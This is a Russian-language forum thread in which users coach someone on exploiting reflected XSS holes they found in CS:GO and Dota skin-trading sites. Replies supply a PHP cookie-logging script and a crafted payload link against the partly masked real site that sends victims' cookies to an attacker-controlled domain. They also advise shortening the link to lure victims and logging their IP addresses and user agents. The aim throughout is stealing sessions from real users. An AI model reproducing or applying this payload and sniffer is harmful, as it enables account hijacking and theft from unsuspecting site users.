Я нашёл XSS уязвимость срабатывает при вводе скрипта и его отправки в саппорт . А как XSS на линку повесить тогда?Что бы когда жертва переходила по линке xss срабатывала и куки приходили на сниффер . Кстати кому надо могу в личку xss слить она от ксго сайта + дота . + Нашёл ещё xss в поиске . Точнее в поиске игроков . При вводе "><script>alert()</script> появляется пустое окно,в поиске игроков за место моего скрипта,появляется \ . + меняется ссылка,туда этот скрипт вбился . Это пассив или актив ? . И как чёрт подери повесить xss на сниффер,у меня снифф онлайн hackerlab .
Скорее всего XSS твоя в POST параметре) Тоже вещь опасная.. Где то видил тут тему создавали про POST XSS, поищи на форуме.
Это вы геев так будете классифицировать. А XSS может быть: 1) Stored (persistent) 2) Reflected 3) DOM-based 4) Self-xss У вас скорее всего тип Reflected.
а как узнать в пост она параметре или нет ?, Чисто для инфы . Сайт продажа/покупка вещей кс го + ещё один сайт для доты(все также токо для доты),переход по сайтам через кнопочку . Авторизация на сайт через стим . Покупка через стим трейд . Защита HTTPS .
Отражённые (Непостоянные) Атака, основанная на отражённой уязвимости, на сегодняшний день является самой распространенной XSS-атакой.Эти уязвимости появляются, когда данные, предоставленные веб-клиентом, чаще всего в параметрах HTTP-запроса или в форме HTML, исполняются непосредственно серверными скриптами для синтаксического анализа и отображения страницы результатов для этого клиента, без надлежащей обработки. Отражённая XSS-атака срабатывает, когда пользователь переходит по специально подготовленной ссылке. Пример: http://example.com/search.php?q=<script>DoSomething();</script> Если сайт не экранирует угловые скобки, преобразуя их в «<» и «>», получим скрипт на странице результатов поиска. Отражённые атаки, как правило, рассылаются по электронной почте или размещаются на Web-странице. URL приманки не вызывает подозрения, указывая на надёжный сайт, но содержит вектор XSS. Если доверенный сайт уязвим к вектору XSS, то переход по ссылке может привести к тому, что браузер жертвы начнет выполнять встроенный скрипт.
Мне нужен сниффер,в котором я могу вставить свою волшебную xss-ссылочку . И ещё,я как понял он ворует кукисы,а в кукисах хэш и если его расшифровать можно получить пароль ? .
Ну ведь скрипт в линке пошёл после "?" знака - смотрите сами ******.net/players/?st="><script>alert()<%2Fscript>
Я ж тебе сказал, поройся в гугле и почитай про пост. Если твоя XSS в посте, ссылочку ты уже не подставишь. Например, данные с полей для входа в админку идут пост параметром. Получается что-то типа того: POST /admin.php ... HTTP-HEADERS ... login=<script>alert(1)</script>&password=pass. Обычный переход по ссылке это GET. Что бы раскрутить твою XSS'ку в посте, нужно заманить жертву на твой сайт, а оттуда можно уже будет отправить POST запрос на уязвимый сайт.
Мне нужен снифф где я могу за место стандартной ссылочке подставить свою,наверное это нужно или можно любую?.
PHP: <?php $cookies = $_GET['cookies']; if ($cookies) file_put_contents('cookies.txt', $cookies."\r\n", FILE_APPEND); Header('Location: pict.jpg', 301);?> сохраняешь код выше в файл snif.php и заливаешь на хостинг, вместе с какой-нибудь картинкой с именем pict.jpg. допустим, твой домен mysnif.ru. тогда ссылка твоя будет вида: ******.net/players/?st="><script>window.location.href='http://mysnif.ru/snif.php?cookies='+document.cookie;</script> Куки будут записаны в файл cookies.txt. Также неплохо бы еще записывать User-Agent и IP, при необходимости допилишь сам
Cлушай,а жертва должна быть зарегена на сайте в котором xss? . Я PHP не знаю,но код я составил так . Spoiler: cod <?php $cookies = $_GET['cookies']; if ($cookies) file_put_contents('cookies.txt', $cookies."\r\n", FILE_APPEND); Header('Location: pict.jpg', 301); ?> $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,"http://.."); curl_setopt($ch, CURLOPT_HEADER, 0); // curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); $result = curl_exec ($ch); curl_close ($ch); У меня сервер на Hostinger.ru,как сделать так что при открытий сайта переходило на xss ?
что-то я не пойму, что ты хочешь сделать... жертве тебе нужно подсунуть ссылку, которую я приводил выше (лучше воспользоваться какой-нибудь сокращалкой). когда жертва по ней перейдет, ее будет перенаправлено на твой скрипт (сниффер), предварительно подставив куки в качестве параметров, откуда сниффер их возьмет и запишет в файл. жертва естественно должна быть зарегана на сайте, иначе нету смысла п*здить у нее куки.
нет. ты подготавливаешь какой-то запрос на курл, а тебе нужно получить юзерагент пользователя, посетившего твой скрипт. храниться он в массиве $_SERVER, там же и айпи клиента: $_SERVER['HTTP_USER_AGENT'] $_SERVER['REMOTE_ADDR']
а куки то ему зачем?) если он их не выставит, то значение все равно будет пустым)) куки от сайта донора передаются в гет параметрах